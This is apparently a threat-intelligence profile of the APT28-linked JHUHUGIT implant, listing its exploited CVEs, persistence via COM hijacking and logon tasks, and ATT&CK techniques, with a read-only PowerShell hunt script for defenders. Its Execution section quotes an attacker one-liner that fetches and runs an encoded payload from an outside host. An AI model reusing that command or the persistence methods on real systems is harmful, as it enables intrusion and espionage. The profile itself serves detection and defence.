JHUHUGIT
JHUHUGIT, also known as Gamefish and associated with the Sednit/Sofacy/APT28/Fancy Bear intrusion set, is a Windows backdoor/implant used in long-running Russian state-linked espionage operations. Public reporting states that it was added to Fancy Bear's toolkit in 2013 and that researchers observed it being delivered via spearphishing, the SedKit exploit kit, DDE-executed PowerShell from Word documents, a Flash zero-day, and a Java zero-day (CVE-2015-2590). It has also been associated with sandbox-escape and privilege-escalation activity using CVE-2015-1701 and CVE-2015-2387, and later reporting ties APT28 exploitation chains to delivery of the GAMEFISH payload after CVE-2017-0262/CVE-2017-0263 exploitation.
Reported capabilities include code injection into browser processes, screenshot capture by simulating the VK_SCREENSHOT key and reading the clipboard before converting the image to JPG, and Base64 encoding of C2 POST data in at least one variant. Persistence mechanisms explicitly cited include registration as a scheduled task that runs at user logon and COM hijacking, including hijacking the MMDeviceEnumerator class and registering the payload as a Shell Icon Overlay handler COM object using CLSID {3543619C-D563-43f7-95EA-4DA7E1CC396A}. Reporting also notes that JHUHUGIT was built with code from the Carberp sources.
Operationally, JHUHUGIT appears in Sednit/APT28 workflows as an early-stage or standalone implant alongside other group malware such as Seduploader, Sedreco, Xagent, CHOPSTICK, CORESHELL, and ADVSTORESHELL. Reported targeting includes governments, military and defense-related entities, embassies, and EU agencies, consistent with broader APT28 targeting of geopolitical, diplomatic, and defense organizations.
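As an added example (not code from the page or its sources), a read-only PowerShell hunt for the persistence artifacts described above: a per-user CLSID override of MMDeviceEnumerator, a Shell Icon Overlay handler registered under the page's CLSID, and logon-triggered scheduled tasks that run from user-writable paths. The MMDeviceEnumerator CLSID is taken from the Windows SDK rather than from the page, and the user-writable path heuristic is an assumption.

```powershell
# Read-only hunt for JHUHUGIT-style persistence; run in an elevated shell for full task visibility.
$OverlayClsid   = '{3543619C-D563-43f7-95EA-4DA7E1CC396A}'  # Shell Icon Overlay handler CLSID from the page
$MmDevEnumClsid = '{BCDE0395-E52F-467C-8E3D-C4579291692E}'  # MMDeviceEnumerator (Windows SDK, not from the page)
$findings = @()

# 1. COM hijack: system classes live under HKLM; a copy under HKCU\Software\Classes
#    is consulted first by COM and therefore shadows the legitimate server DLL.
foreach ($clsid in @($MmDevEnumClsid, $OverlayClsid)) {
    $userKey = "HKCU:\Software\Classes\CLSID\$clsid\InprocServer32"
    if (Test-Path $userKey) {
        $dll = (Get-ItemProperty -Path $userKey -ErrorAction SilentlyContinue).'(default)'
        $findings += [pscustomobject]@{ Check = 'HKCU CLSID override'; Key = $userKey; Value = $dll }
    }
}

# 2. Shell Icon Overlay handler whose default value is the page's CLSID (Explorer loads these at start).
$overlayRoot = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers'
if (Test-Path $overlayRoot) {
    Get-ChildItem -Path $overlayRoot | ForEach-Object {
        $val = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).'(default)'
        if ($val -and ($val -ieq $OverlayClsid)) {
            $findings += [pscustomobject]@{ Check = 'Overlay handler'; Key = $_.PSPath; Value = $val }
        }
    }
}

# 3. Scheduled tasks with a logon trigger whose action runs from a user-writable location
#    (heuristic: AppData, Temp, ProgramData, Users\Public). Assumption, not a page-stated path.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    $atLogon = $task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }
    if (-not $atLogon) { return }
    foreach ($a in $task.Actions) {
        if ("$($a.Execute)" -match '\\(AppData|Temp|ProgramData|Users\\Public)\\') {
            $findings += [pscustomobject]@{ Check = 'Logon task'; Key = $task.TaskName; Value = "$($a.Execute) $($a.Arguments)" }
        }
    }
}

if ($findings.Count -eq 0) { 'No JHUHUGIT-style persistence artifacts found.' }
else { $findings | Format-Table -AutoSize }
```

Any hit from check 1 or 2 is high confidence because the CLSIDs are specific; check 3 is a triage heuristic and will need a look at the task's binary before acting on it.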
Vulnerabilities exploited
25 CVEs have been correlated with this family across public research and vendor advisories. Each entry below quotes the source that links the vulnerability to the family.
Analysis of the document revealed its end goal: dropping Sednit’s well-known reconnaissance tool, Seduploader. To achieve this, Sednit used two zero-day exploits: ... CVE-2017-0262 ... and ... CVE-2017-0263.
JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.
IoCs Table 2 lists a phishing document (f3805382ae2e23ff1147301d131a06e00e4ff75f) detected as Win32/Exploit.CVE-2016-4117.A; the report describes Sednit’s DealersChoice platform embedding Adobe Flash Player exploits in malicious Office documents.
IoCs Table 2 lists a lure document (World War3.docx; SHA-1 7aada8bcc0d1ab8ffb1f0fae4757789c6f5546a3) detected as SWF/Exploit.CVE-2017-11292.A; the report notes DealersChoice generates malicious documents with embedded Adobe Flash Player exploits.
The RTF attachment exploits the CVE-2015-1641 vulnerability to drop two DLLs on the system... This particular case is one among a series of attacks using the CVE-2015-1641 vulnerability launched from April 2016 by the Sednit group.
Seduploader serves as reconnaissance malware. It is made up of two distinct components: a dropper and the persistent payload installed by this dropper.
CVE-2015-2424 Microsoft Office 0-day at the time the Sednit group used it. Seduploader deployed with targeted phishing emails using a 0-day exploit for the Microsoft Office vulnerability CVE-2015-2424.
The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day (CVE-2015-2590) in July 2015.
JHUHUGIT (which is built with code from the Carberp sources)... its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox.
Table 1. Vulnerabilities exploited with targeted phishing attachments:
CVE-2009-3129 Microsoft Excel.
CVE-2010-3333 Microsoft Office.
CVE-2012-0158 Microsoft Office.
CVE-2013-2729 Adobe Acrobat Reader.
CVE-2014-1761 Microsoft Word, 0-day at the time the Sednit group used it.
Table 3. Sedkit exploited vulnerabilities:
CVE-2013-1347 Internet Explorer 8.
CVE-2013-3897 Internet Explorer 8.
CVE-2014-1510 / CVE-2014-1511 Firefox.
CVE-2014-1776 Internet Explorer 11.
CVE-2015-5119 Adobe Flash, revamped from Hacking Team leaked data.
CVE-2015-3043 Adobe Flash, 0-day at the time Sedkit used it.
CVE-2015-4902 Java, 0-day at the time Sedkit used it.
CVE-2015-7645 Adobe Flash, 0-day at the time Sedkit used it.
The vulnerability CVE-2014-6332 was discovered in May 2014... Soon after the disclosure, a proof-of-concept was released... in October 2015 a simple revamped version of the original proof-of-concept was added to Sedkit. But the Sednit group went one step further in February 2016 by deploying a different exploit for this vulnerability.
Groups observed using it
1 distinct threat actor has been attributed by public researchers.
Spear phishing campaigns or the SedKit exploit kit delivered the Seduploader first stage.
Techniques & procedures
25 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
They also send emails purportedly containing links to news items, but instead linking to malware drop sites that install toolkits onto the target's computer.
Execution
5 techniques
“Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.” / “APT29 used scheduler and schtasks to create new tasks on remote host as part of their lateral movement… updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.”
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
“powershell.exe -NoP -sta -NonI -W Hidden… DownloadString('http://sendmevideo.org/.../eee.txt'); powershell -enc $e” / “Seduploader dropper replaced by PowerShell commands delivering the Seduploader payload.”
APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution. Blue Mockingbird has used batch script files to automate execution and deployment of payloads. During HomeLand Justice, threat actors used Windows batch files for persistence and execution.
Persistence
3 techniques
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Privilege Escalation
5 techniques
The content repeatedly describes malware and threat actors injecting shellcode, DLLs, or payloads into legitimate processes such as svchost.exe, explorer.exe, iexplore.exe, cmd.exe, lsass.exe, and browser processes.
APT28 has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges. ... APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host. ... multiple groups/tools exploit various CVEs to escalate privileges.
Stealth
6 techniques
The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
Many entries explicitly describe deleting artifacts 'to cover tracks,' 'evade detection,' 'remove evidence,' 'reduce their footprint,' or as part of 'post-intrusion cleanup process.' Examples include APT28 deleting files to cover tracks, FIN5 using SDelete to clean up the environment, and Dragonfly deleting operational files as part of cleanup.
Credential Access
1 technique
Discovery
4 techniques
"APT32 ... query the Windows Registry to gather system information"; "JHUHUGIT obtains ... hard drive information from Windows registry key HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum"
The content repeatedly describes actors and malware using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, netsh interface show, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, and network adapter/interface details.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
"4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands"
Collection
2 techniques
Command and Control
3 techniques
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
A first-stage loader delivered via spear phishing or SedKit as part of APT28's earlier implant chain.
Malware that injects its own functions into browser processes.
Backdoor that registers as a scheduled task to run at user logon.
Sofacy-associated implant used in espionage operations, deployed against diplomatic/government targets.